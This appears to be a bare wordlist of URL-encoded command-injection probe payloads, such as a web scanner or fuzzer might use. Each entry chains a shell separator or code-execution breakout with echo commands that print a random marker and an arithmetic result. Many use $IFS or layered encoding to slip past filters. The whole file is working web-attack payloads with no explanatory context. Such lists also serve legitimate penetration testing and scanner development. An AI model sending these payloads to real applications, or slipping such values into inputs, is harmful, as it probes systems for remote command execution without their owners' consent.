+|echo$IFSXACUZH$((38%2B20))$(echo$IFSXACUZH)XACUZH%5C%5C +||echo$IFSCDNNJT$((44%2B92))$(echo$IFSCDNNJT)CDNNJT%5C%5C +&&echo$IFSQGZOTF$((32%2B38))$(echo$IFSQGZOTF)QGZOTF%5C%5C +%0aecho$IFSVXNZFI$((43%2B77))$(echo$IFSVXNZFI)VXNZFI%5C%5C +%3Becho$IFSKUUKMT$((50%2B2))$(echo$IFSKUUKMT)KUUKMT%5C%5C +%26echo$IFSUNNWEF$((23%2B41))$(echo$IFSUNNWEF)UNNWEF%5C%5C +%26%26echo$IFSBTZBFI$((26%2B9))$(echo$IFSBTZBFI)BTZBFI%5C%5C +%7Cecho$IFSUXKUGT$((68%2B89))$(echo$IFSUXKUGT)UXKUGT%5C%5C +%7C%7Cecho$IFSCPXZIZ$((42%2B75))$(echo$IFSCPXZIZ)CPXZIZ%5C%5C +echo$IFSNEIUQG$((81%2B27))$(echo$IFSNEIUQG)NEIUQG%2F%2F +%20echo%20AGJORR$((30%2B64))$(echo%20AGJORR)AGJORR%2F%2F +;echo$IFSZFBJPC$((94%2B13))$(echo$IFSZFBJPC)ZFBJPC%2F%2F +&echo$IFSBALCSS$((45%2B32))$(echo$IFSBALCSS)BALCSS%2F%2F +|echo$IFSRLIAHI$((26%2B64))$(echo$IFSRLIAHI)RLIAHI%2F%2F +||echo$IFSFYOTZG$((27%2B28))$(echo$IFSFYOTZG)FYOTZG%2F%2F +&&echo$IFSEQAZRH$((48%2B41))$(echo$IFSEQAZRH)EQAZRH%2F%2F +%0aecho$IFSZJGMJR$((29%2B4))$(echo$IFSZJGMJR)ZJGMJR%2F%2F +%3Becho$IFSGOFGQM$((48%2B74))$(echo$IFSGOFGQM)GOFGQM%2F%2F +%26echo$IFSNHIGJT$((60%2B13))$(echo$IFSNHIGJT)NHIGJT%2F%2F +%26%26echo$IFSXIMJKY$((88%2B60))$(echo$IFSXIMJKY)XIMJKY%2F%2F +%7Cecho$IFSOLIGWD$((87%2B60))$(echo$IFSOLIGWD)OLIGWD%2F%2F +%7C%7Cecho$IFSWFKQVE$((90%2B1))$(echo$IFSWFKQVE)WFKQVE%2F%2F +echo$IFSKILZJB$((46%2B73))$(echo$IFSKILZJB)KILZJB%26 +%20echo%20QZXLFH$((87%2B1))$(echo%20QZXLFH)QZXLFH%26 +;echo$IFSKNVVGI$((69%2B44))$(echo$IFSKNVVGI)KNVVGI%26 +&echo$IFSGGNKZG$((61%2B42))$(echo$IFSGGNKZG)GGNKZG%26 +|echo$IFSOOHCGM$((30%2B35))$(echo$IFSOOHCGM)OOHCGM%26 +||echo$IFSUUHQZJ$((20%2B57))$(echo$IFSUUHQZJ)UUHQZJ%26 +&&echo$IFSZBRXDH$((79%2B80))$(echo$IFSZBRXDH)ZBRXDH%26 +%0aecho$IFSYUKKNH$((56%2B49))$(echo$IFSYUKKNH)YUKKNH%26 +%3Becho$IFSVCXHRJ$((81%2B64))$(echo$IFSVCXHRJ)VCXHRJ%26 +%26echo$IFSQKYNMI$((45%2B66))$(echo$IFSQKYNMI)QKYNMI%26 +%26%26echo$IFSQSKLWT$((87%2B73))$(echo$IFSQSKLWT)QSKLWT%26 +%7Cecho$IFSZBEWBO$((6%2B42))$(echo$IFSZBEWBO)ZBEWBO%26 +%7C%7Cecho$IFSDNZMGO$((37%2B14))$(echo$IFSDNZMGO)DNZMGO%26 +echo$IFSAGOPUQ$((42%2B10))$(echo$IFSAGOPUQ)AGOPUQ%7C +%20echo%20OWFQEK$((68%2B50))$(echo%20OWFQEK)OWFQEK%7C +;echo$IFSKGPTGS$((5%2B86))$(echo$IFSKGPTGS)KGPTGS%7C +&echo$IFSSTSBFI$((8%2B30))$(echo$IFSSTSBFI)STSBFI%7C +|echo$IFSCETCMO$((72%2B54))$(echo$IFSCETCMO)CETCMO%7C +||echo$IFSGUUNMQ$((78%2B22))$(echo$IFSGUUNMQ)GUUNMQ%7C +&&echo$IFSSYDVAH$((5%2B92))$(echo$IFSSYDVAH)SYDVAH%7C +%0aecho$IFSEWPWSX$((63%2B88))$(echo$IFSEWPWSX)EWPWSX%7C +%3Becho$IFSQXXUTJ$((23%2B47))$(echo$IFSQXXUTJ)QXXUTJ%7C +%26echo$IFSWWWJLY$((48%2B38))$(echo$IFSWWWJLY)WWWJLY%7C +%26%26echo$IFSAOUDEZ$((1%2B19))$(echo$IFSAOUDEZ)AOUDEZ%7C +%7Cecho$IFSRIYZJH$((86%2B76))$(echo$IFSRIYZJH)RIYZJH%7C +%7C%7Cecho$IFSMCOPIM$((20%2B16))$(echo$IFSMCOPIM)MCOPIM%7C +%26echo$IFSFGJBHF$((15%2B32))$(echo$IFSFGJBHF)FGJBHF +%26%20echo%20TIBIEC$((4%2B66))$(echo%20TIBIEC)TIBIEC +;echo$IFSRHWTNA$((89%2B71))$(echo$IFSRHWTNA)RHWTNA +&echo$IFSMIRTWY$((62%2B53))$(echo$IFSMIRTWY)MIRTWY +|echo$IFSKZQOKA$((45%2B18))$(echo$IFSKZQOKA)KZQOKA +||echo$IFSKDFDHF$((15%2B62))$(echo$IFSKDFDHF)KDFDHF +&&echo$IFSARASQY$((54%2B7))$(echo$IFSARASQY)ARASQY +%0aecho$IFSIDFVQL$((32%2B50))$(echo$IFSIDFVQL)IDFVQL +%3Becho$IFSTREOSX$((82%2B26))$(echo$IFSTREOSX)TREOSX +%26echo$IFSKNRSWF$((61%2B96))$(echo$IFSKNRSWF)KNRSWF +%26%26echo$IFSKLSCLG$((90%2B83))$(echo$IFSKLSCLG)KLSCLG +%7Cecho$IFSSWFONC$((23%2B88))$(echo$IFSSWFONC)SWFONC +%7C%7Cecho$IFSPNPVKS$((7%2B36))$(echo$IFSPNPVKS)PNPVKS +echo$IFSMFYMXE$((53%2B41))$(echo$IFSMFYMXE)MFYMXE' +%20echo%20ZEKBWJ$((52%2B55))$(echo%20ZEKBWJ)ZEKBWJ' +;echo$IFSHVLOAR$((38%2B86))$(echo$IFSHVLOAR)HVLOAR' +&echo$IFSGQPCYE$((3%2B64))$(echo$IFSGQPCYE)GQPCYE' +|echo$IFSIYVBZD$((59%2B23))$(echo$IFSIYVBZD)IYVBZD' +||echo$IFSKGDWNL$((30%2B97))$(echo$IFSKGDWNL)KGDWNL' +&&echo$IFSOVPFJY$((4%2B71))$(echo$IFSOVPFJY)OVPFJY' +%0aecho$IFSTYZEHS$((92%2B83))$(echo$IFSTYZEHS)TYZEHS' +%3Becho$IFSXKGKWO$((82%2B28))$(echo$IFSXKGKWO)XKGKWO' +%26echo$IFSCTPDWS$((75%2B8))$(echo$IFSCTPDWS)CTPDWS' +%26%26echo$IFSHRVANY$((38%2B49))$(echo$IFSHRVANY)HRVANY' +%7Cecho$IFSSBTHEA$((52%2B44))$(echo$IFSSBTHEA)SBTHEA' +%7C%7Cecho$IFSRGNFOX$((20%2B17))$(echo$IFSRGNFOX)RGNFOX' +echo$IFSCWQJJR$((12%2B68))$(echo$IFSCWQJJR)CWQJJR" +%20echo%20WJGLHQ$((32%2B43))$(echo%20WJGLHQ)WJGLHQ" +;echo$IFSWYKTNX$((57%2B37))$(echo$IFSWYKTNX)WYKTNX" +&echo$IFSJZGSQS$((35%2B79))$(echo$IFSJZGSQS)JZGSQS" +|echo$IFSQFRZWC$((58%2B49))$(echo$IFSQFRZWC)QFRZWC" +||echo$IFSUEGFHX$((37%2B52))$(echo$IFSUEGFHX)UEGFHX" +&&echo$IFSWMOQUS$((33%2B35))$(echo$IFSWMOQUS)WMOQUS" +%0aecho$IFSRVNRNT$((25%2B8))$(echo$IFSRVNRNT)RVNRNT" +%3Becho$IFSFGMEVK$((82%2B64))$(echo$IFSFGMEVK)FGMEVK" +%26echo$IFSKWKDEB$((37%2B89))$(echo$IFSKWKDEB)KWKDEB" +%26%26echo$IFSPCPZYO$((56%2B87))$(echo$IFSPCPZYO)PCPZYO" +%7Cecho$IFSATHGRY$((94%2B45))$(echo$IFSATHGRY)ATHGRY" +%7C%7Cecho$IFSPLQDHT$((81%2B8))$(echo$IFSPLQDHT)PLQDHT" +echo$IFSUYTATZ$((65%2B69))$(echo$IFSUYTATZ)UYTATZ +%20echo%20DWUNAS$((73%2B45))$(echo%20DWUNAS)DWUNAS +;echo$IFSDYVMJQ$((81%2B59))$(echo$IFSDYVMJQ)DYVMJQ +&echo$IFSSFXMFL$((26%2B3))$(echo$IFSSFXMFL)SFXMFL +|echo$IFSTPUAPH$((74%2B20))$(echo$IFSTPUAPH)TPUAPH +||echo$IFSETWMKB$((45%2B66))$(echo$IFSETWMKB)ETWMKB +&&echo$IFSJQGTZT$((74%2B60))$(echo$IFSJQGTZT)JQGTZT +%0aecho$IFSEMHHKB$((6%2B28))$(echo$IFSEMHHKB)EMHHKB +%3Becho$IFSMQUPHW$((66%2B11))$(echo$IFSMQUPHW)MQUPHW +%26echo$IFSYETOFB$((93%2B7))$(echo$IFSYETOFB)YETOFB +%26%26echo$IFSCRVQIY$((43%2B55))$(echo$IFSCRVQIY)CRVQIY +%7Cecho$IFSQKTYDP$((13%2B93))$(echo$IFSQKTYDP)QKTYDP +%7C%7Cecho$IFSHIOXYU$((5%2B45))$(echo$IFSHIOXYU)HIOXYU +echo$IFSONQRPJ$((44%2B25))$(echo$IFSONQRPJ)ONQRPJ// +%20echo%20IOTEZW$((83%2B52))$(echo%20IOTEZW)IOTEZW// +;echo$IFSZIROGF$((6%2B49))$(echo$IFSZIROGF)ZIROGF// +&echo$IFSEGQCCP$((72%2B31))$(echo$IFSEGQCCP)EGQCCP// +|echo$IFSZGMESR$((73%2B1))$(echo$IFSZGMESR)ZGMESR// +||echo$IFSDAJJOA$((63%2B6))$(echo$IFSDAJJOA)DAJJOA// +&&echo$IFSYSBJXS$((33%2B16))$(echo$IFSYSBJXS)YSBJXS// +%0aecho$IFSGAMIHF$((8%2B20))$(echo$IFSGAMIHF)GAMIHF// +%3Becho$IFSGIAMLN$((3%2B33))$(echo$IFSGIAMLN)GIAMLN// +%26echo$IFSSAEWRK$((96%2B15))$(echo$IFSSAEWRK)SAEWRK// +%26%26echo$IFSLRENSC$((21%2B32))$(echo$IFSLRENSC)LRENSC// +%7Cecho$IFSSMHPXX$((60%2B18))$(echo$IFSSMHPXX)SMHPXX// +%7C%7Cecho$IFSXSPEPB$((67%2B12))$(echo$IFSXSPEPB)XSPEPB// +echo$IFSJMCTGN$((61%2B39))$(echo$IFSJMCTGN)JMCTGN\ +%20echo%20YGXKOB$((39%2B6))$(echo%20YGXKOB)YGXKOB\ +;echo$IFSGPDOCC$((56%2B25))$(echo$IFSGPDOCC)GPDOCC\ +&echo$IFSJHJDBQ$((59%2B7))$(echo$IFSJHJDBQ)JHJDBQ\ +|echo$IFSPYNQQN$((22%2B41))$(echo$IFSPYNQQN)PYNQQN\ +||echo$IFSXEGABJ$((43%2B91))$(echo$IFSXEGABJ)XEGABJ\ +&&echo$IFSKQEDXL$((91%2B84))$(echo$IFSKQEDXL)KQEDXL\ +%0aecho$IFSVXZGNO$((12%2B40))$(echo$IFSVXZGNO)VXZGNO\ +%3Becho$IFSPSOQAR$((79%2B87))$(echo$IFSPSOQAR)PSOQAR\ +%26echo$IFSRNOWIN$((9%2B87))$(echo$IFSRNOWIN)RNOWIN\ +%26%26echo$IFSDKXDPB$((45%2B44))$(echo$IFSDKXDPB)DKXDPB\ +%7Cecho$IFSAQWEET$((38%2B66))$(echo$IFSAQWEET)AQWEET\ +%7C%7Cecho$IFSXRRNLV$((42%2B73))$(echo$IFSXRRNLV)XRRNLV\ +echo$IFSWAXZNH$((13%2B26))$(echo$IFSWAXZNH)WAXZNH& +%20echo%20FMKAYB$((43%2B18))$(echo%20FMKAYB)FMKAYB& +;echo$IFSNFQTQE$((64%2B35))$(echo$IFSNFQTQE)NFQTQE& +&echo$IFSGHAYMK$((85%2B70))$(echo$IFSGHAYMK)GHAYMK& +|echo$IFSILKQLY$((38%2B92))$(echo$IFSILKQLY)ILKQLY& +||echo$IFSJTVIEI$((59%2B6))$(echo$IFSJTVIEI)JTVIEI& +&&echo$IFSRUHGTD$((2%2B41))$(echo$IFSRUHGTD)RUHGTD& +%0aecho$IFSYBIRAD$((77%2B75))$(echo$IFSYBIRAD)YBIRAD& +%3Becho$IFSNZACRG$((6%2B1))$(echo$IFSNZACRG)NZACRG& +%26echo$IFSOXDOPZ$((45%2B42))$(echo$IFSOXDOPZ)OXDOPZ& +%26%26echo$IFSMCBQMM$((11%2B98))$(echo$IFSMCBQMM)MCBQMM& +%7Cecho$IFSEJJUPB$((40%2B97))$(echo$IFSEJJUPB)EJJUPB& +%7C%7Cecho$IFSCJGMRV$((68%2B61))$(echo$IFSCJGMRV)CJGMRV& +echo$IFSAAZQPF$((47%2B0))$(echo$IFSAAZQPF)AAZQPF| +%20echo%20GWYMFM$((13%2B53))$(echo%20GWYMFM)GWYMFM| +;echo$IFSHKIKWV$((20%2B23))$(echo$IFSHKIKWV)HKIKWV| +&echo$IFSPTGUJI$((21%2B75))$(echo$IFSPTGUJI)PTGUJI| +|echo$IFSESSSWT$((28%2B90))$(echo$IFSESSSWT)ESSSWT| +||echo$IFSDEGINN$((57%2B72))$(echo$IFSDEGINN)DEGINN| +&&echo$IFSLXPMRF$((61%2B87))$(echo$IFSLXPMRF)LXPMRF| +%0aecho$IFSVPYEIG$((0%2B32))$(echo$IFSVPYEIG)VPYEIG| +%3Becho$IFSBJQYNU$((71%2B12))$(echo$IFSBJQYNU)BJQYNU| +%26echo$IFSKZFTIO$((50%2B29))$(echo$IFSKZFTIO)KZFTIO| +%26%26echo$IFSZAYXMZ$((3%2B83))$(echo$IFSZAYXMZ)ZAYXMZ| +%7Cecho$IFSJWHQHE$((54%2B5))$(echo$IFSJWHQHE)JWHQHE| +%7C%7Cecho$IFSHRKGCV$((26%2B87))$(echo$IFSHRKGCV)HRKGCV| +echo$IFSBFVSUE$((14%2B45))$(echo$IFSBFVSUE)BFVSUE%27 +%20echo%20IJYFHL$((62%2B88))$(echo%20IJYFHL)IJYFHL%27 +;echo$IFSGLCFHE$((9%2B20))$(echo$IFSGLCFHE)GLCFHE%27 +&echo$IFSBGJFMV$((55%2B92))$(echo$IFSBGJFMV)BGJFMV%27 +|echo$IFSZFFAPM$((39%2B91))$(echo$IFSZFFAPM)ZFFAPM%27 +||echo$IFSMWPSUX$((83%2B82))$(echo$IFSMWPSUX)MWPSUX%27 +&&echo$IFSUUESOS$((61%2B71))$(echo$IFSUUESOS)UUESOS%27 +%0aecho$IFSLRBMQR$((4%2B80))$(echo$IFSLRBMQR)LRBMQR%27 +%3Becho$IFSLWIDNI$((59%2B10))$(echo$IFSLWIDNI)LWIDNI%27 +%26echo$IFSEHCFWA$((81%2B0))$(echo$IFSEHCFWA)EHCFWA%27 +%26%26echo$IFSVEMRKI$((43%2B17))$(echo$IFSVEMRKI)VEMRKI%27 +%7Cecho$IFSAVHQSF$((54%2B86))$(echo$IFSAVHQSF)AVHQSF%27 +%7C%7Cecho$IFSBUDOYZ$((31%2B53))$(echo$IFSBUDOYZ)BUDOYZ%27 +echo$IFSJEPZHW$((73%2B73))$(echo$IFSJEPZHW)JEPZHW%22 +%20echo%20JMDNRV$((22%2B54))$(echo%20JMDNRV)JMDNRV%22 +;echo$IFSPRIHYT$((43%2B53))$(echo$IFSPRIHYT)PRIHYT%22 +&echo$IFSCMDMMG$((63%2B46))$(echo$IFSCMDMMG)CMDMMG%22 +|echo$IFSGFJBIP$((75%2B97))$(echo$IFSGFJBIP)GFJBIP%22 +||echo$IFSOXMDCJ$((76%2B31))$(echo$IFSOXMDCJ)OXMDCJ%22 +&&echo$IFSLHVDJA$((34%2B71))$(echo$IFSLHVDJA)LHVDJA%22 +%0aecho$IFSFLQCFH$((50%2B41))$(echo$IFSFLQCFH)FLQCFH%22 +%3Becho$IFSOHDIIO$((86%2B73))$(echo$IFSOHDIIO)OHDIIO%22 +%26echo$IFSKOBRCD$((77%2B43))$(echo$IFSKOBRCD)KOBRCD%22 +%26%26echo$IFSOWHNUL$((45%2B96))$(echo$IFSOWHNUL)OWHNUL%22 +%7Cecho$IFSCYXIRA$((56%2B74))$(echo$IFSCYXIRA)CYXIRA%22 +%7C%7Cecho$IFSLSGARN$((66%2B92))$(echo$IFSLSGARN)LSGARN%22 +echo$IFSBXVMDK$((6%2B31))$(echo$IFSBXVMDK)BXVMDK%5C%5C +%20echo%20LCFCBB$((47%2B22))$(echo%20LCFCBB)LCFCBB%5C%5C +;echo$IFSHWOOOB$((33%2B98))$(echo$IFSHWOOOB)HWOOOB%5C%5C +&echo$IFSPYIUYZ$((71%2B45))$(echo$IFSPYIUYZ)PYIUYZ%5C%5C +|echo$IFSAMCJYH$((20%2B48))$(echo$IFSAMCJYH)AMCJYH%5C%5C +||echo$IFSUCPPVT$((17%2B44))$(echo$IFSUCPPVT)UCPPVT%5C%5C +&&echo$IFSDFYDRA$((1%2B96))$(echo$IFSDFYDRA)DFYDRA%5C%5C +%0aecho$IFSODUPZQ$((21%2B13))$(echo$IFSODUPZQ)ODUPZQ%5C%5C +%3Becho$IFSXJAFQU$((79%2B24))$(echo$IFSXJAFQU)XJAFQU%5C%5C +%26echo$IFSBWATKS$((45%2B68))$(echo$IFSBWATKS)BWATKS%5C%5C +%26%26echo$IFSKBVKTU$((41%2B2))$(echo$IFSKBVKTU)KBVKTU%5C%5C +%7Cecho$IFSIXAXIN$((24%2B47))$(echo$IFSIXAXIN)IXAXIN%5C%5C +%7C%7Cecho$IFSXZTTAD$((21%2B98))$(echo$IFSXZTTAD)XZTTAD%5C%5C +echo$IFSYIGMIK$((93%2B31))$(echo$IFSYIGMIK)YIGMIK%2F%2F +%20echo%20PIWJVB$((35%2B55))$(echo%20PIWJVB)PIWJVB%2F%2F +;echo$IFSAQHLIY$((38%2B77))$(echo$IFSAQHLIY)AQHLIY%2F%2F +&echo$IFSCXFXGD$((63%2B87))$(echo$IFSCXFXGD)CXFXGD%2F%2F +|echo$IFSUZPDRC$((26%2B91))$(echo$IFSUZPDRC)UZPDRC%2F%2F +||echo$IFSAOIEWW$((12%2B22))$(echo$IFSAOIEWW)AOIEWW%2F%2F +&&echo$IFSTRGLMB$((67%2B67))$(echo$IFSTRGLMB)TRGLMB%2F%2F +%0aecho$IFSTWDCWQ$((75%2B11))$(echo$IFSTWDCWQ)TWDCWQ%2F%2F +%3Becho$IFSCAANPZ$((68%2B82))$(echo$IFSCAANPZ)CAANPZ%2F%2F +%26echo$IFSVUHFEV$((97%2B15))$(echo$IFSVUHFEV)VUHFEV%2F%2F +%26%26echo$IFSCFKMSQ$((61%2B81))$(echo$IFSCFKMSQ)CFKMSQ%2F%2F +%7Cecho$IFSUSIKAS$((1%2B68))$(echo$IFSUSIKAS)USIKAS%2F%2F +%7C%7Cecho$IFSXCDKHN$((36%2B59))$(echo$IFSXCDKHN)XCDKHN%2F%2F +echo$IFSVNBHRD$((3%2B40))$(echo$IFSVNBHRD)VNBHRD%26 +%20echo%20NJKFHE$((39%2B55))$(echo%20NJKFHE)NJKFHE%26 +;echo$IFSSFSQHL$((95%2B33))$(echo$IFSSFSQHL)SFSQHL%26 +&echo$IFSHBNWJW$((18%2B27))$(echo$IFSHBNWJW)HBNWJW%26 +|echo$IFSGOWBHJ$((93%2B50))$(echo$IFSGOWBHJ)GOWBHJ%26 +||echo$IFSWOSZUB$((94%2B79))$(echo$IFSWOSZUB)WOSZUB%26 +&&echo$IFSLXSNBD$((51%2B37))$(echo$IFSLXSNBD)LXSNBD%26 +%0aecho$IFSKKFGER$((40%2B66))$(echo$IFSKKFGER)KKFGER%26 +%3Becho$IFSMSQSJK$((23%2B24))$(echo$IFSMSQSJK)MSQSJK%26 +%26echo$IFSWJHRPR$((2%2B76))$(echo$IFSWJHRPR)WJHRPR%26 +%26%26echo$IFSJMVDAO$((52%2B94))$(echo$IFSJMVDAO)JMVDAO%26 +%7Cecho$IFSRKAPVH$((51%2B24))$(echo$IFSRKAPVH)RKAPVH%26 +%7C%7Cecho$IFSKGBLOE$((27%2B72))$(echo$IFSKGBLOE)KGBLOE%26 +echo$IFSXZNCQP$((56%2B62))$(echo$IFSXZNCQP)XZNCQP%7C +%20echo%20VYWJPM$((40%2B5))$(echo%20VYWJPM)VYWJPM%7C +;echo$IFSXTEPMK$((70%2B42))$(echo$IFSXTEPMK)XTEPMK%7C +&echo$IFSBVUDYH$((40%2B0))$(echo$IFSBVUDYH)BVUDYH%7C +|echo$IFSGIHYII$((20%2B80))$(echo$IFSGIHYII)GIHYII%7C +||echo$IFSUNKBIA$((84%2B96))$(echo$IFSUNKBIA)UNKBIA%7C +&&echo$IFSQOTWYJ$((4%2B30))$(echo$IFSQOTWYJ)QOTWYJ%7C +%0aecho$IFSTCNIRU$((23%2B88))$(echo$IFSTCNIRU)TCNIRU%7C +%3Becho$IFSCFUQON$((7%2B1))$(echo$IFSCFUQON)CFUQON%7C +%26echo$IFSCNSGBG$((72%2B11))$(echo$IFSCNSGBG)CNSGBG%7C +%26%26echo$IFSYLKPEL$((22%2B81))$(echo$IFSYLKPEL)YLKPEL%7C +%7Cecho$IFSLBCAYT$((13%2B58))$(echo$IFSLBCAYT)LBCAYT%7C +%7C%7Cecho$IFSEXCORO$((79%2B26))$(echo$IFSEXCORO)EXCORO%7C +print(`echo%20BAYPKT`.`echo%20$((43%2B10))`.`echo%20BAYPKT`.`echo%20BAYPKT`)%3BBAYPKT +print(`echo%20DWYWNU;echo%20$((31%2B36));echo%20DWYWNU;echo%20DWYWNU`)%3BDWYWNU +print(`echo%20OKEJJB%0aecho%20$((46%2B60))%0aecho%20OKEJJB%0aecho%20OKEJJB`)%3BOKEJJB +print(`echo%20COMCFL\necho%20$((84%2B79))\necho%20COMCFL\necho%20COMCFL`)%3BCOMCFL +print(`echo%20ADZJNM`.`echo%20$((71%2B71))`.`echo%20ADZJNM`.`echo%20ADZJNM`)%3B%5C%5CADZJNM +print(`echo%20DEGOPG;echo%20$((38%2B61));echo%20DEGOPG;echo%20DEGOPG`)%3B%255C%255CDEGOPG +print(`echo%20QGZDYY%0aecho%20$((26%2B56))%0aecho%20QGZDYY%0aecho%20QGZDYY`)%3B%25255C%25255CQGZDYY +print(`echo%20DAESAZ\necho%20$((6%2B17))\necho%20DAESAZ\necho%20DAESAZ`)%3B%2525255C%2525255CDAESAZ +print(`echo%20OSGUGU`.`echo%20$((64%2B8))`.`echo%20OSGUGU`.`echo%20OSGUGU`)%3B//OSGUGU +print(`echo%20LPXWJK;echo%20$((35%2B1));echo%20LPXWJK;echo%20LPXWJK`)%3B//LPXWJK +print(`echo%20XEMHBO%0aecho%20$((11%2B24))%0aecho%20XEMHBO%0aecho%20XEMHBO`)%3B//XEMHBO +print(`echo%20ETZHWZ\necho%20$((20%2B88))\necho%20ETZHWZ\necho%20ETZHWZ`)%3B//ETZHWZ +print(`echo%20GENLGI`.`echo%20$((14%2B11))`.`echo%20GENLGI`.`echo%20GENLGI`)%3B%23GENLGI +print(`echo%20DYZZIW;echo%20$((94%2B81));echo%20DYZZIW;echo%20DYZZIW`)%3B%2523DYZZIW +print(`echo%20UBBYNF%0aecho%20$((67%2B26))%0aecho%20UBBYNF%0aecho%20UBBYNF`)%3B%252523UBBYNF +print(`echo%20EIPAAC\necho%20$((42%2B82))\necho%20EIPAAC\necho%20EIPAAC`)%3B%25252523EIPAAC +print(`echo%20WQMIIN`.`echo%20$((36%2B90))`.`echo%20WQMIIN`.`echo%20WQMIIN`)%3B.%22WQMIIN +print(`echo%20NSKJQW;echo%20$((41%2B11));echo%20NSKJQW;echo%20NSKJQW`)%3B.%2522NSKJQW +print(`echo%20DBCNNO%0aecho%20$((39%2B97))%0aecho%20DBCNNO%0aecho%20DBCNNO`)%3B.%252522DBCNNO +print(`echo%20GDOHGQ\necho%20$((28%2B89))\necho%20GDOHGQ\necho%20GDOHGQ`)%3B.%25252522GDOHGQ +print(`echo%20RREYBJ`.`echo%20$((33%2B25))`.`echo%20RREYBJ`.`echo%20RREYBJ`)%3B.%27RREYBJ +print(`echo%20PFLDED;echo%20$((95%2B99));echo%20PFLDED;echo%20PFLDED`)%3B.%2527PFLDED +print(`echo%20TVCCND%0aecho%20$((62%2B6))%0aecho%20TVCCND%0aecho%20TVCCND`)%3B.%252527TVCCND +print(`echo%20HHRISK\necho%20$((73%2B42))\necho%20HHRISK\necho%20HHRISK`)%3B.%25252527HHRISK +print(`echo%20WZLIFQ`.`echo%20$((3%2B42))`.`echo%20WZLIFQ`.`echo%20WZLIFQ`)%29%7DWZLIFQ +print(`echo%20ZHAWPM;echo%20$((18%2B57));echo%20ZHAWPM;echo%20ZHAWPM`)%3B%2529%257DZHAWPM +print(`echo%20XWPSAV%0aecho%20$((22%2B11))%0aecho%20XWPSAV%0aecho%20XWPSAV`)%3B%252529%25257DXWPSAV +print(`echo%20BQVIXY\necho%20$((53%2B95))\necho%20BQVIXY\necho%20BQVIXY`)%3B%25252529%2525257DBQVIXY +'print(`echo%20DUAYMM`.`echo%20$((77%2B73))`.`echo%20DUAYMM`.`echo%20DUAYMM`)%3BDUAYMM +'print(`echo%20TUDOUK;echo%20$((63%2B88));echo%20TUDOUK;echo%20TUDOUK`)%3BTUDOUK +'print(`echo%20AHOHOK%0aecho%20$((14%2B28))%0aecho%20AHOHOK%0aecho%20AHOHOK`)%3BAHOHOK +'print(`echo%20BRTYSY\necho%20$((74%2B40))\necho%20BRTYSY\necho%20BRTYSY`)%3BBRTYSY +'print(`echo%20DQLEND`.`echo%20$((63%2B84))`.`echo%20DQLEND`.`echo%20DQLEND`)%3B%5C%5CDQLEND +'print(`echo%20RAZRYE;echo%20$((84%2B60));echo%20RAZRYE;echo%20RAZRYE`)%3B%255C%255CRAZRYE +'print(`echo%20MURMGO%0aecho%20$((13%2B87))%0aecho%20MURMGO%0aecho%20MURMGO`)%3B%25255C%25255CMURMGO +'print(`echo%20WSILLK\necho%20$((70%2B70))\necho%20WSILLK\necho%20WSILLK`)%3B%2525255C%2525255CWSILLK +'print(`echo%20GGTKKU`.`echo%20$((23%2B93))`.`echo%20GGTKKU`.`echo%20GGTKKU`)%3B//GGTKKU +'print(`echo%20CRERAD;echo%20$((48%2B33));echo%20CRERAD;echo%20CRERAD`)%3B//CRERAD +'print(`echo%20STJAIG%0aecho%20$((89%2B81))%0aecho%20STJAIG%0aecho%20STJAIG`)%3B//STJAIG +'print(`echo%20CVFEYY\necho%20$((56%2B86))\necho%20CVFEYY\necho%20CVFEYY`)%3B//CVFEYY +'print(`echo%20KKQSRA`.`echo%20$((71%2B76))`.`echo%20KKQSRA`.`echo%20KKQSRA`)%3B%23KKQSRA +'print(`echo%20GSORDT;echo%20$((68%2B29));echo%20GSORDT;echo%20GSORDT`)%3B%2523GSORDT +'print(`echo%20TPBMFF%0aecho%20$((79%2B13))%0aecho%20TPBMFF%0aecho%20TPBMFF`)%3B%252523TPBMFF +'print(`echo%20WCPHMV\necho%20$((3%2B88))\necho%20WCPHMV\necho%20WCPHMV`)%3B%25252523WCPHMV +'print(`echo%20MKGGZP`.`echo%20$((69%2B92))`.`echo%20MKGGZP`.`echo%20MKGGZP`)%3B.%22MKGGZP +'print(`echo%20UPGYTK;echo%20$((49%2B93));echo%20UPGYTK;echo%20UPGYTK`)%3B.%2522UPGYTK +'print(`echo%20FQEMGW%0aecho%20$((58%2B2))%0aecho%20FQEMGW%0aecho%20FQEMGW`)%3B.%252522FQEMGW +'print(`echo%20UDOCFL\necho%20$((86%2B7))\necho%20UDOCFL\necho%20UDOCFL`)%3B.%25252522UDOCFL +'print(`echo%20ANYJLP`.`echo%20$((86%2B96))`.`echo%20ANYJLP`.`echo%20ANYJLP`)%3B.%27ANYJLP +'print(`echo%20ADRNCB;echo%20$((35%2B33));echo%20ADRNCB;echo%20ADRNCB`)%3B.%2527ADRNCB +'print(`echo%20AYKYLG%0aecho%20$((60%2B1))%0aecho%20AYKYLG%0aecho%20AYKYLG`)%3B.%252527AYKYLG +'print(`echo%20JIKWPW\necho%20$((92%2B0))\necho%20JIKWPW\necho%20JIKWPW`)%3B.%25252527JIKWPW +'print(`echo%20MLMZKH`.`echo%20$((30%2B25))`.`echo%20MLMZKH`.`echo%20MLMZKH`)%29%7DMLMZKH +'print(`echo%20RRMVOG;echo%20$((30%2B37));echo%20RRMVOG;echo%20RRMVOG`)%3B%2529%257DRRMVOG +'print(`echo%20BFUQZN%0aecho%20$((42%2B76))%0aecho%20BFUQZN%0aecho%20BFUQZN`)%3B%252529%25257DBFUQZN +'print(`echo%20AWHBQS\necho%20$((81%2B11))\necho%20AWHBQS\necho%20AWHBQS`)%3B%25252529%2525257DAWHBQS +)print(`echo%20VWOEOC`.`echo%20$((97%2B4))`.`echo%20VWOEOC`.`echo%20VWOEOC`)%3BVWOEOC +)print(`echo%20VIVSXO;echo%20$((60%2B28));echo%20VIVSXO;echo%20VIVSXO`)%3BVIVSXO +)print(`echo%20HQNHAD%0aecho%20$((91%2B64))%0aecho%20HQNHAD%0aecho%20HQNHAD`)%3BHQNHAD +)print(`echo%20MADCWE\necho%20$((88%2B74))\necho%20MADCWE\necho%20MADCWE`)%3BMADCWE +)print(`echo%20QQGYPS`.`echo%20$((10%2B39))`.`echo%20QQGYPS`.`echo%20QQGYPS`)%3B%5C%5CQQGYPS +)print(`echo%20DLBCJS;echo%20$((58%2B85));echo%20DLBCJS;echo%20DLBCJS`)%3B%255C%255CDLBCJS +)print(`echo%20UDBRRF%0aecho%20$((39%2B57))%0aecho%20UDBRRF%0aecho%20UDBRRF`)%3B%25255C%25255CUDBRRF 